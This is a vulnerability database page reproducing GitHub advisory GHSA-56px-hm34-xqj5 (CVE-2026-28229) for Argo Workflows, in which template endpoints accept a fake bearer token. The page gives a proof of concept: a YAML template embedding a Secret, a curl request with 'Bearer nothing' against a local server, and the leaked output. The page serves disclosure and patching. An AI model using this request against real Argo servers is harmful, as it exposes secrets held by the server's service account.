GHSA-56PX-HM34-XQJ5

Vulnerability from github – Published: 2026-03-11 14:49 – Updated: 2026-03-11 20:43
VLAI?
Summary
Unauthorized access to Argo Workflows Template
Details

Summary

Workflow templates endpoints allow any client to retrieve WorkflowTemplates (and ClusterWorkflowTemplates). Any request with a Authorization: Bearer nothing token can leak sensitive template content, including embedded Secret manifests.

Details

https://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/workflowtemplate/workflow_template_server.go#L60-L78

https://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/clusterworkflowtemplate/cluster_workflow_template_server.go#L54-L72

Informers use the server’s rest config, so they read using server SA privileges.

https://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/workflowtemplate/informer.go#L29-L42

https://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/clusterworkflowtemplate/informer.go#L34-L46

PoC

  1. Create template
apiVersion: argoproj.io/v1alpha1
kind: WorkflowTemplate
metadata:
  name: leak-workflow-template
  namespace: argo
spec:
  templates:
  - name: make-secret
    resource:
      action: create
      manifest: |
        apiVersion: v1
        kind: Secret
        metadata:
          name: leaked-secret
        type: Opaque
        data:
          password: c3VwZXJzZWNyZXQ=

Then apply that with kubectl apply -f poc.yml 2. Query Argo Server with a fake token

Result:

> kubectl apply -f poc.yml
workflowtemplate.argoproj.io/leak-workflow-template created
> curl -sk -H "Authorization: Bearer nothing" \
    "https://localhost:2746/api/v1/workflow-templates/argo/leak-workflow-template"
{"metadata":{"name":"leak-workflow-template","namespace":"argo","uid":"6f91481c-df9a-4aeb-9fe3-a3fb6b12e11c","resourceVersion":"867394","generation":1,"creationTimestamp":"REDACTED","annotations":{"kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"argoproj.io/v1alpha1\",\"kind\":\"WorkflowTemplate\",\"metadata\":{\"annotations\":{},\"name\":\"leak-workflow-template\",\"namespace\":\"argo\"},\"spec\":{\"templates\":[{\"name\":\"make-secret\",\"resource\":{\"action\":\"create\",\"manifest\":\"apiVersion: v1\\nkind: Secret\\nmetadata:\\n  name: leaked-secret\\ntype: Opaque\\ndata:\\n  password: c3VwZXJzZWNyZXQ=\\n\"}}]}}\n"},"managedFields":[{"manager":"kubectl-client-side-apply","operation":"Update","apiVersion":"argoproj.io/v1alpha1","time":"REDACTED","fieldsType":"FieldsV1","fieldsV1":{"f:metadata":{"f:annotations":{".":{},"f:kubectl.kubernetes.io/last-applied-configuration":{}}},"f:spec":{".":{},"f:templates":{}}}}]},"spec":{"templates":[{"name":"make-secret","inputs":{},"outputs":{},"metadata":{},"resource":{"action":"create","manifest":"apiVersion: v1\nkind: Secret\nmetadata:\n  name: leaked-secret\ntype: Opaque\ndata:\n  password: c3VwZXJzZWNyZXQ=\n"}}],"arguments":{}}}

Impact

Any client can leaks Workflow Template and Cluster Workflow Template data, including secrets, artifact locations, service account usage, env vars, and resource manifests.

Severity ?
7.5 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-workflows/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.7.11"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-workflows/v4"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-28229"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-11T14:49:37Z",
    "nvd_published_at": "2026-03-11T16:16:40Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nWorkflow templates endpoints allow any client to retrieve WorkflowTemplates (and ClusterWorkflowTemplates). Any request with a `Authorization: Bearer nothing` token can leak sensitive template content, including embedded Secret manifests.\n\n### Details\n\nhttps://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/workflowtemplate/workflow_template_server.go#L60-L78\n\nhttps://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/clusterworkflowtemplate/cluster_workflow_template_server.go#L54-L72\n\nInformers use the server\u2019s rest config, so they read using server SA privileges. \n\nhttps://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/workflowtemplate/informer.go#L29-L42\n\nhttps://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/clusterworkflowtemplate/informer.go#L34-L46\n\n### PoC\n1. Create template\n\n```yml\napiVersion: argoproj.io/v1alpha1\nkind: WorkflowTemplate\nmetadata:\n  name: leak-workflow-template\n  namespace: argo\nspec:\n  templates:\n  - name: make-secret\n    resource:\n      action: create\n      manifest: |\n        apiVersion: v1\n        kind: Secret\n        metadata:\n          name: leaked-secret\n        type: Opaque\n        data:\n          password: c3VwZXJzZWNyZXQ=\n```\n\nThen apply that with `kubectl apply -f poc.yml`\n2. Query Argo Server with a fake token\n\n**Result:**\n\n```cmd\n\u003e kubectl apply -f poc.yml\nworkflowtemplate.argoproj.io/leak-workflow-template created\n\u003e curl -sk -H \"Authorization: Bearer nothing\" \\\n    \"https://localhost:2746/api/v1/workflow-templates/argo/leak-workflow-template\"\n{\"metadata\":{\"name\":\"leak-workflow-template\",\"namespace\":\"argo\",\"uid\":\"6f91481c-df9a-4aeb-9fe3-a3fb6b12e11c\",\"resourceVersion\":\"867394\",\"generation\":1,\"creationTimestamp\":\"REDACTED\",\"annotations\":{\"kubectl.kubernetes.io/last-applied-configuration\":\"{\\\"apiVersion\\\":\\\"argoproj.io/v1alpha1\\\",\\\"kind\\\":\\\"WorkflowTemplate\\\",\\\"metadata\\\":{\\\"annotations\\\":{},\\\"name\\\":\\\"leak-workflow-template\\\",\\\"namespace\\\":\\\"argo\\\"},\\\"spec\\\":{\\\"templates\\\":[{\\\"name\\\":\\\"make-secret\\\",\\\"resource\\\":{\\\"action\\\":\\\"create\\\",\\\"manifest\\\":\\\"apiVersion: v1\\\\nkind: Secret\\\\nmetadata:\\\\n  name: leaked-secret\\\\ntype: Opaque\\\\ndata:\\\\n  password: c3VwZXJzZWNyZXQ=\\\\n\\\"}}]}}\\n\"},\"managedFields\":[{\"manager\":\"kubectl-client-side-apply\",\"operation\":\"Update\",\"apiVersion\":\"argoproj.io/v1alpha1\",\"time\":\"REDACTED\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\".\":{},\"f:kubectl.kubernetes.io/last-applied-configuration\":{}}},\"f:spec\":{\".\":{},\"f:templates\":{}}}}]},\"spec\":{\"templates\":[{\"name\":\"make-secret\",\"inputs\":{},\"outputs\":{},\"metadata\":{},\"resource\":{\"action\":\"create\",\"manifest\":\"apiVersion: v1\\nkind: Secret\\nmetadata:\\n  name: leaked-secret\\ntype: Opaque\\ndata:\\n  password: c3VwZXJzZWNyZXQ=\\n\"}}],\"arguments\":{}}}\n```\n\n### Impact\nAny client can leaks Workflow Template and Cluster Workflow Template data, including secrets, artifact locations, service account usage, env vars, and resource manifests.",
  "id": "GHSA-56px-hm34-xqj5",
  "modified": "2026-03-11T20:43:29Z",
  "published": "2026-03-11T14:49:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-56px-hm34-xqj5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28229"
    },
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-workflows/commit/34afaf9c0c36f1ba8645d483ea4752cfc4a391e8"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/argoproj/argo-workflows"
    },
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-workflows/releases/tag/v3.7.11"
    },
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-workflows/releases/tag/v4.0.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Unauthorized access to Argo Workflows Template"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.